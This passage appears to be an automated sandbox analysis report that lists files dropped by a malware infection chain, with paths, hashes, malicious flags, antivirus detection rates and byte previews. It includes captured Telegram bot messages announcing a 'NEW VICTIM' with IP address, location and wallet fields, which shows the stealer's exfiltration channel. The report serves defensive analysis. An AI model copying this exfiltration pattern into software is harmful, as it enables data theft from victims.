Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\mozglue[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\msvcp140[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\nss3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\output[1].png

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe
File Type:	PNG image data, 438 x 438, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	156917
Entropy (8bit):	7.994509354006501
Encrypted:	true
SSDEEP:	3072:T0ogum1PKnCjOE92xFfR4Iti+Zv95YU9Zq3mLTp1lD+tFre:T0oRCa6Gz4U9+6Q3O+Fre
MD5:	F89267B24ECF471C16ADD613CEC34473
SHA1:	C3AAD9D69A3848CEDB8912E237B06D21E1E9974F
SHA-256:	21F12ABB6DE14E72D085BC0BD90D630956C399433E85275C4C144CD9818CBF92
SHA-512:	C29176C7E1D58DD4E1DEAFCBD72956B8C27E923FB79D511EE244C91777D3B3E41D0C3977A8A9FBE094BAC371253481DDE5B58ABF4F2DF989F303E5D262E1CE4D
Malicious:	false
Yara Hits:	Rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive, Description: Detects images embedding archives. Observed in TheRat RAT., Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\output[1].png, Author: ditekSHen
Reputation:	unknown
Preview:	.PNG........IHDR................p....IDATx....\|.e....3......D dw6...S..Y.[......#L..g.r.....$XA=.f.............)...?.I.(.dv.3.l..~>~>..3.dw.y.<o.$I......+.a...t..=.h..@......#.....%X...C..TE....6g......0..q.......=.d>..e[-.R..,..$)YN<...2'..$..t.m.<l@...^..sJR.&..$%...c.....-9?a33..K..(+.[.$..2.IRk.xb..&..L..%..:.o....$)...&I..}.@b.u.}lny=...E.?..]IJ..LjK.4..#....$.......5...mK.....$.k.i.2....,8.j..`....C..E&6I....R..DzM.Ci..]..x{.*.H.S.HI2k.....s.Jj..(.....D."IN!..$..t...cE.....S.[t....r(R...>.Pr.. Gt(1.l`......@$I4.c.$..Ew;8.E(..>.AH.....$.d..B..T..d6Fa....$...A.$......Y!..D. I....$5g......@..PL2...a..D."I...U.$.c.O......r.. $I$..$...#..V.(.b..d..M.....cH.q(.v..B.D..M.b9f\>...H@>6.b...2.IR,.0 ..X....$."..$...~.CH.b. :.I.E&6I.EA..!$../:.I.E&6I.I...A.rE. I...&I.....B.h...$I...$).V...!a..C.$Qdb..X.\|':....+:.I.E&6I..:cM4..$c...$I...$)...v.X-:..l.......V..M..A.KE../"ZR_.L..Ll...C.D../..E. I"..&I...fth/uT.y...$.db......y.a.E..X....qH.H2.IR....@..8..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1985024
Entropy (8bit):	7.934912947712122
Encrypted:	false
SSDEEP:	24576:rP+AXJnenhDBV6oXTQ0pCPx2WOe7XKFdJ14xvKuvOy+EJvXWSNuMERtWYX4bmn2p:rP9JotV6ojQnYOyPDFEpXD4MEX3Cmni
MD5:	5A3F6AA1107D91BDC0430E2A0C1F4F26
SHA1:	316139DD3EDCD5AF3A8AFBD89E44AC10BB8E87E7
SHA-256:	F43DED143A77002B6AA1B860AECCA5B94E00A601D1DB104D04423E3B5E0261CA
SHA-512:	712F40770C3D645E54AAC46ECB6CF51065AE30253E39E5FDA861191D23AA2BE2BB1D1E69043610F9AD22F2C86C532C759C2A4E06277B85C056E1C9F097C9143A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 37%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!J..@$..@$..@$......@$......@$......@$..._..@$..@%..@$......@$......@$......@$.Rich.@$.........PE..L......d..........................................@.........................................................................Z.B.n.....@.h!.................................................. ....................................................... . ..@......T..................@....rsrc...h!....@......d..............@....idata ......B.....................@... . *.. B.....................@...ehftnwgk.0...@l..(..................@...unlnktmr.....p.......$..............@....taggant.0......."...(..............@...........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\random[2].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	727552
Entropy (8bit):	7.888061454157426
Encrypted:	false
SSDEEP:	12288:tyNudyx57oPuBlhyyZzWDtkfDdEIHiyO+rBlhyyZzWDtkfDdEIHiyO+N:t+3x5s2BCyqXIdXBCyqXId5
MD5:	28E568616A7B792CAC1726DEB77D9039
SHA1:	39890A418FB391B823ED5084533E2E24DFF021E1
SHA-256:	9597798F7789ADC29FBE97707B1BD8CA913C4D5861B0AD4FDD6B913AF7C7A8E2
SHA-512:	85048799E6D2756F1D6AF77F34E6A1F454C48F2F43042927845931B7ECFF2E5DE45F864627A3D4AA061252401225BBB6C2CAA8532320CCBE401E97C9C79AC8E5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 66%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....$Xg.................N..........,6............@..........................P......\|z....@.................................l...d...................................................................8h..............4...d............................text...AM.......N.................. ..`.rdata..<~...`.......V..............@..@.data...L...........................@....rsrc...............................@..@.reloc..............................@..B.bss.........0......................@....bss................................@...................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\random[3].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2660864
Entropy (8bit):	6.051984276194483
Encrypted:	false
SSDEEP:	49152:gd/7YsW9mB5b+c2J9hFLuamiqFeQuADlaUoHtM3ljgfyeqX+zBE:gd/7vW9mHbH2J9hFLuamiPQuklaUoH2g
MD5:	2A78CE9F3872F5E591D643459CABE476
SHA1:	9AC947DFC71A868BC9C2EB2BD78DFB433067682E
SHA-256:	21A2AC44ACD7A640735870EEBFD04B8DC57BC66877CB5BE3B929299E86A43DAE
SHA-512:	03E2CD8161A1394EE535A2EA7D197791AB715D69A02FFAB98121EC5AC8150D2B17A9A32A59307042C4BBEFFAD7425B55EFA047651DE6ED39277DBA80711454F9
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 68%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............A...A...A...@...A...@'..A...@...A.4.@...A.4.@...A.4.@...A...@...A...A...A4.@...A46A...A4.@...ARich...A........................PE..L....YVg.................$...........$.......$...@...........................(.....dm)...@...................................%.(....@%.%....................@(.......%.p.............................%.@.............$..............................text...2.$.......$................. ..`.rdata...^....$..`....$.............@..@.data........ %.......%.............@....rsrc...%....@%.......%.............@..@.reloc.......@(.......(.............@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\sendMessage[1].json

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	776
Entropy (8bit):	5.107720644959812
Encrypted:	false
SSDEEP:	24:YKOH5y1JVBa4YGQVPe071kWhPyoZEB6eiasJENBm9c:YVH5QTBj/Q519PtZLujMc
MD5:	6787AB0483D4847B990B4A185E6D8DD1
SHA1:	D55D5A667E9F61148307C94FDD5B78EBF198A746
SHA-256:	9C791FF6F5D1F1C538D140E0068CFD020E33166637CAF0A9C56A6CB07B793BFB
SHA-512:	8A9D8EEE13D6DF5770F314F5CF9052269895A30BBFE269DA1B0FACF3FB356A69685CA700EA628020798545BC833905B93BC1A43F7DC0B46FCB91782AB47290FB
Malicious:	false
Reputation:	unknown
Preview:	{"ok":true,"result":{"message_id":3303,"from":{"id":7855878545,"is_bot":true,"first_name":"srhjdftjkw4","username":"srhjdftjkw4_bot"},"chat":{"id":7427009775,"first_name":"\u041a\u0430\u0440\u0434\u0430\u043d","last_name":"\u0412\u0430\u043b\u043e\u0432","username":"kardanvalov88","type":"private"},"date":1734018513,"text":"\ud83d\udd14NEW VICTIM - Extensions Installed\nIP Address: 8.46.123.189\nDevice Name: 921702\nLocation: New York City, New York, US\nWallets:\nNothing found","entities":[{"offset":0,"length":35,"type":"bold"},{"offset":36,"length":11,"type":"bold"},{"offset":48,"length":12,"type":"url"},{"offset":61,"length":12,"type":"bold"},{"offset":81,"length":9,"type":"bold"},{"offset":119,"length":8,"type":"bold"},{"offset":128,"length":13,"type":"code"}]}}

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\softokn3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\t5abhIx[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	605696
Entropy (8bit):	6.377818589865092
Encrypted:	false
SSDEEP:	12288:aYoGFIZzm1vI5ubYumjqu6lpvD/IlfUye7K3c:aYoGFIZzm1vlbFmjWlpL/Iw7K3
MD5:	3567CB15156760B2F111512FFDBC1451
SHA1:	2FDB1F235FC5A9A32477DAB4220ECE5FDA1539D4
SHA-256:	0285D3A6C1CA2E3A993491C44E9CF2D33DBEC0FB85FDBF48989A4E3B14B37630
SHA-512:	E7A31B016417218387A4702E525D33DD4FE496557539B2AB173CEC0CB92052C750CFC4B3E7F02F3C66AC23F19A0C8A4EB6C9D2B590A5E9FAEB525E517BC877BA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 63%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......M...............B.......B.......v.......v......B........v..c...R.......B.......B...............Bw......Bw+.......C.....Bw......Rich....................PE..d...1.1g.........."....).....l.......2.........@..........................................`..........................................................`..H.......tL...........p..........p.......................(...@...@............................................text...>........................... ..`.rdata..d...........................@..@.data....;..........................@....pdata..tL.......N..................@..@.rsrc...H....`.......,..............@..@.reloc.......p.......2..............@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\vcruntime140[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\download[1].htm

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Reputation:	unknown
Preview:	0

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\dwVrTdy[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	605696
Entropy (8bit):	6.377818589865092
Encrypted:	false
SSDEEP:	12288:aYoGFIZzm1vI5ubYumjqu6lpvD/IlfUye7K3c:aYoGFIZzm1vlbFmjWlpL/Iw7K3
MD5:	3567CB15156760B2F111512FFDBC1451
SHA1:	2FDB1F235FC5A9A32477DAB4220ECE5FDA1539D4
SHA-256:	0285D3A6C1CA2E3A993491C44E9CF2D33DBEC0FB85FDBF48989A4E3B14B37630
SHA-512:	E7A31B016417218387A4702E525D33DD4FE496557539B2AB173CEC0CB92052C750CFC4B3E7F02F3C66AC23F19A0C8A4EB6C9D2B590A5E9FAEB525E517BC877BA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 63%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......M...............B.......B.......v.......v......B........v..c...R.......B.......B...............Bw......Bw+.......C.....Bw......Rich....................PE..d...1.1g.........."....).....l.......2.........@..........................................`..........................................................`..H.......tL...........p..........p.......................(...@...@............................................text...>........................... ..`.rdata..d...........................@..@.data....;..........................@....pdata..tL.......N..................@..@.rsrc...H....`.......,..............@..@.reloc.......p.......2..............@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\fuckingdllENCR[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe
File Type:	data
Category:	dropped
Size (bytes):	97296
Entropy (8bit):	7.9982317718947025
Encrypted:	true
SSDEEP:	1536:A1FazaNKjs9ezO6kGnCRFVjltPjM9Ew1MhiIeJfZCQdOlnq32YTCUZiyAS3tUX9F:k4zaMjVUGCRzbgqw1MoIeJyQ4nyqX9F
MD5:	E6743949BBF24B39B25399CD7C5D3A2E
SHA1:	DBE84C91A9B0ACCD2C1C16D49B48FAEAEC830239
SHA-256:	A3B82FC46635A467CC8375D40DDBDDD71CAE3B7659D2BB5C3C4370930AE9468C
SHA-512:	3D50396CDF33F5C6522D4C485D96425C0DDB341DB9BD66C43EAE6D8617B26A4D9B4B9A5AEE0457A4F1EC6FAC3CB8208C562A479DCAE024A50143CBFA4E1F15F6
Malicious:	false
Reputation:	unknown
Preview:	XM .4Ih..]...t.&.s...v.0{.v.vs'...:.l.h...e.....R....1...r.R+Fk....~.s.....Q.....r.T.b.....~c..[........;...j.@.0.%.....x...v.w.....<ru....Yre;.b6...HQ-...8.B..Q.a...R.:.h&r.......=.;r.k..T.@....l..;#..3!.O..x.}........y'<.GfQ.K.#.L5v..].......d....N{e..@................A\..<.t.u.X.O.n..Z.. .Xb.O<.Z...h~.(.W.f.z.V.4..L...%5.0...H..`s...y.B......(IL5s:aS}X.......M9.J.o....).'..M;n6]...W..n....)...L...._..e.....>....[....RA.........'...6.N..g6....IY.%h.. 3r....^..\.b~y./....h.2......ZLk....u}..V..<.fbD.<!.._2.zo..IE...P..O...u......P.......w#.6N..&l.R}GI...LY...N.yz..j..Hy.'..._.5..Pd9.y..+....6.q...).G.c...L#....5\.M....5U])....U(..~H.m....Y....G1.r.4.B..h........P..]i...M%.............)q......]....~\|..j...b..K!..N.7R.}T.2bsq..1...L^..!.\|q.D'...s.Ln...D@..bn%0=b.Q1.....+l...QXO\|.......NC.d......{.0....8F.....<.W.y..{o..j.3.....n..4.....eS]. K...o.B.H~.sh.1....m8....6{.ls..R..q..~....w._;....X*.#..U....6n.ODbT.+Zc....q....S.$-S`YT....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	970752
Entropy (8bit):	6.703412903051273
Encrypted:	false
SSDEEP:	24576:JqDEvCTbMWu7rQYlBQcBiT6rprG8aym0Z:JTvC/MTQYxsWR7aym0
MD5:	E477E0C89BDFE4F98170878F85624A0C
SHA1:	F0321409B7D9B8303BA46B53A5BBDBB26C6B446E
SHA-256:	41D06B73F313D3F14D3ECD825911751B7C1ED171FB0CE546662A934A3CB6F3ED
SHA-512:	C2C1890EC0078F552AFEF0BB6F0F088E08B81843526435E6EC32092E58FDCD8A2F6B5DD3C5372FE9545821ED5E382BFC55887DAA2F0F67809008C819245BC017
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 26%
Reputation:	unknown
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L.....Zg..........".......... ......w.............@..........................0.......8....@...@.......@.....................d...\|....@..(e.......................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...(e...@...f..................@..@.reloc...u.......v...Z..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\random[2].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1807360
Entropy (8bit):	7.943588775528353
Encrypted:	false
SSDEEP:	24576:FXRnTWS9M6G832tc8aegrm2rIEjvWDBqE0A+hBcwbPna7r4EK5DwUoza:FBaSm6nCaetEKDcH+7rD5U1
MD5:	CD917C036DA4DC2B3E30E12B135A87E2
SHA1:	E1D0A610EBC4D4500D01CE193A803A94542893DD
SHA-256:	73BF8E4A7D1BAA981576BD9789CA7B13F9E53424DC283000474753EF51C11F4A
SHA-512:	8F095FB21086EF7CF673F8EEE5218592E7C0CF1397A2B4B11B7B5F29C0B6F194F1F1C8961B9218094146022D64D0093251D57D419A09B61D7A0571672B96C2FB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 47%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d..d..d....s.\|....F.i....r.^..m.[.g..m.K.b....g..d.......w.w....E.e..Richd..........PE..L....dTg.....................(.......`i...........@...........................i.....y.....@.................................M.$.a.....$.......................$..................................................................................... . ..$......h..................@....rsrc.........$......x..............@....idata ......$......z..............@... ..*...$......\|..............@...tdoajogz.....`O......~..............@...xfulpslq.....Pi......n..............@....taggant.0...`i.."...r..............@...................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\sendMessage[1].json

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	776
Entropy (8bit):	5.107347076752981
Encrypted:	false
SSDEEP:	24:YKOHOy1JVBa4YGQVPe071kWJPyoZEB6eiasJENBm9c:YVHOQTBj/Q51lPtZLujMc
MD5:	E4326EF0B80D3B8CD32DEE94E8CABD62
SHA1:	100C4505EA1FC0D67B2ABE7BA2CAE5B34D4FAC2D
SHA-256:	D302D214F72BDC29DE447E104D527D28269AA03B15385A2E102F27835AAECBBF
SHA-512:	2D0385C82704A5542A520F5B47E710854C7636056EC2D527A982C422C0E94D2B85F64D3D2DF881D285DB5A4751310477A63DF1A28296E32CC4A249F0211E7D8F
Malicious:	false
Reputation:	unknown
Preview:	{"ok":true,"result":{"message_id":3300,"from":{"id":7855878545,"is_bot":true,"first_name":"srhjdftjkw4","username":"srhjdftjkw4_bot"},"chat":{"id":7427009775,"first_name":"\u041a\u0430\u0440\u0434\u0430\u043d","last_name":"\u0412\u0430\u043b\u043e\u0432","username":"kardanvalov88","type":"private"},"date":1734018508,"text":"\ud83d\udd14NEW VICTIM - Extensions Installed\nIP Address: 8.46.123.189\nDevice Name: 921702\nLocation: New York City, New York, US\nWallets:\nNothing found","entities":[{"offset":0,"length":35,"type":"bold"},{"offset":36,"length":11,"type":"bold"},{"offset":48,"length":12,"type":"url"},{"offset":61,"length":12,"type":"bold"},{"offset":81,"length":9,"type":"bold"},{"offset":119,"length":8,"type":"bold"},{"offset":128,"length":13,"type":"code"}]}}

C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	605696
Entropy (8bit):	6.377818589865092
Encrypted:	false
SSDEEP:	12288:aYoGFIZzm1vI5ubYumjqu6lpvD/IlfUye7K3c:aYoGFIZzm1vlbFmjWlpL/Iw7K3
MD5:	3567CB15156760B2F111512FFDBC1451
SHA1:	2FDB1F235FC5A9A32477DAB4220ECE5FDA1539D4
SHA-256:	0285D3A6C1CA2E3A993491C44E9CF2D33DBEC0FB85FDBF48989A4E3B14B37630
SHA-512:	E7A31B016417218387A4702E525D33DD4FE496557539B2AB173CEC0CB92052C750CFC4B3E7F02F3C66AC23F19A0C8A4EB6C9D2B590A5E9FAEB525E517BC877BA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 63%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......M...............B.......B.......v.......v......B........v..c...R.......B.......B...............Bw......Bw+.......C.....Bw......Rich....................PE..d...1.1g.........."....).....l.......2.........@..........................................`..........................................................`..H.......tL...........p..........p.......................(...@...@............................................text...>........................... ..`.rdata..d...........................@..@.data....;..........................@....pdata..tL.......N..................@..@.rsrc...H....`.......,..............@..@.reloc.......p.......2..............@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	605696
Entropy (8bit):	6.377818589865092
Encrypted:	false
SSDEEP:	12288:aYoGFIZzm1vI5ubYumjqu6lpvD/IlfUye7K3c:aYoGFIZzm1vlbFmjWlpL/Iw7K3
MD5:	3567CB15156760B2F111512FFDBC1451
SHA1:	2FDB1F235FC5A9A32477DAB4220ECE5FDA1539D4
SHA-256:	0285D3A6C1CA2E3A993491C44E9CF2D33DBEC0FB85FDBF48989A4E3B14B37630
SHA-512:	E7A31B016417218387A4702E525D33DD4FE496557539B2AB173CEC0CB92052C750CFC4B3E7F02F3C66AC23F19A0C8A4EB6C9D2B590A5E9FAEB525E517BC877BA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 63%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......M...............B.......B.......v.......v......B........v..c...R.......B.......B...............Bw......Bw+.......C.....Bw......Rich....................PE..d...1.1g.........."....).....l.......2.........@..........................................`..........................................................`..H.......tL...........p..........p.......................(...@...@............................................text...>........................... ..`.rdata..d...........................@..@.data....;..........................@....pdata..tL.......N..................@..@.rsrc...H....`.......,..............@..@.reloc.......p.......2..............@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
